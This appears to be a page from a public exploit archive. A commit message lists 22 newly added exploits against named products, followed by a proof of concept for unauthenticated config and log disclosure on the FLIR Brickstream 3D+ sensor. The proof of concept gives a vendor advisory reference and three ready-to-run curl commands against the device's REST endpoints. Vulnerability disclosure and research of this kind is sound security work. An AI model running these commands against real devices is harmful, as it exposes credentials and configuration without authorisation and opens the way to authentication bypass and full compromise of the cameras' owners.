731dd0f423
22 changes to exploits/shellcodes Snes9K 0.0.9z - Buffer Overflow (SEH) NoMachine < 5.3.27 - Remote Code Execution MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection FLIR Brickstream 3D+ - RTSP Stream Disclosure FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure CAMALEON CMS 2.4 - Cross-Site Scripting Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin) AlchemyCMS 4.1 - Cross-Site Scripting FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution College Notes Management System 1.0 - 'user' SQL Injection Advanced HRM 1.6 - Remote Code Execution Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities Academic Timetable Final Build 7.0 - Information Disclosure KORA 2.7.0 - 'cid' SQL Injection
20 lines
No EOL
959 B
Text
20 lines
No EOL
959 B
Text
# Exploit Title: FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
|
|
# Author: Gjoko 'LiquidWorm' Krstic
|
|
# Date: 2018-10-14
|
|
# Vendor: FLIR Systems, Inc.
|
|
# Product web page: http://www.brickstream.com
|
|
# Affected version: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif: 0.1.1.47
|
|
# Tested on: Titan, Api/1.0.0
|
|
# References:
|
|
# ZSL-2018-5495
|
|
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php
|
|
|
|
# Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
|
|
# download and file disclosure vulnerability when calling the ExportConfig REST
|
|
# API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
|
|
# information and help her in authentication bypass, privilege escalation and/or
|
|
# full system access.
|
|
|
|
$ curl http://192.168.2.1:8083/getConfigExportFile.cgi
|
|
$ curl http://192.168.2.1:8083/restapi/system/ExportConfig
|
|
$ curl http://192.168.2.1:8083/restapi/system/ExportLogs |